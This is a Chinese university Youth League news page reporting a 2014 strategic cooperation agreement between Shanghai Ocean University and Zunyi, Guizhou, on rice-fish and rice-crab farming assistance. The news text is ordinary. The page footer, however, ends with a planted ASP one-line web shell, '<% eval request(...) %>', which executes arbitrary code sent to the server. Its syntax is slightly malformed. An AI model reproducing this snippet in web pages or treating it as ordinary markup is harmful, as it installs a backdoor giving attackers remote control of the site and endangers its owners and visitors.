当前位置:共青团上海海洋大学委员会 >> 新闻中心 >> 要闻速递 >> 正文  
站内信息搜索:
我校与贵州省遵义市签署战略合作框架协议
[2014年05月13日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

    为贯彻落实党中央、国务院关于上海市对口帮扶遵义市的要求和部署,充分发挥我校的科技人才优势,促进学校科研成果和技术优势在西部省份的推广与应用,5月4日-6日,副校长黄硕琳率领科技处副处长王伟江、水产与生命学院王成辉教授和马旭洲副教授一行来到革命老区贵州省遵义市,考察该市的现代渔业发展情况,实地调研遵义市稻田养鱼与稻田养蟹等工作。

签约仪式

    5月5日下午,副校长黄硕琳与遵义市副市长田刚在遵义市政府签订了《遵义市人民政府与上海海洋大学战略合作框架协议》,正式拉开了我校技术帮扶遵义市发展现代渔业的序幕。

    贵州省遵义市是上海市对口帮扶地区,今年3月下旬,遵义市副市长田刚率领遵义市农业代表团访问上海,在上海市农委主持下,与上海相关农业单位、专家进行了座谈。听完我校介绍后,田刚当即邀请我校为遵义市的现代渔业发展,特别是稻鱼、稻蟹共生工程提供技术帮扶。4月18日-20日,我校农业部渔业科技入户工程首席专家王武教授、水产与生命学院王成辉教授和马旭洲副教授赴遵义市进行了先期考察。

考察遵义市稻鱼共生工程

    我 校与贵州省遵义市有较好的合作基础。早在2008年,我校选育的瓯江彩鲤被引进到贵州省7个地、州、市的12个县进行养殖,其中遵义市是最大的养殖区。今年,我校选育的中华绒螯蟹良种即将输送至遵义,为当地的现代渔业发展注入新的活力。

 

关闭窗口

上一篇:“奋斗的青春最美丽”

下一篇:没有了
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>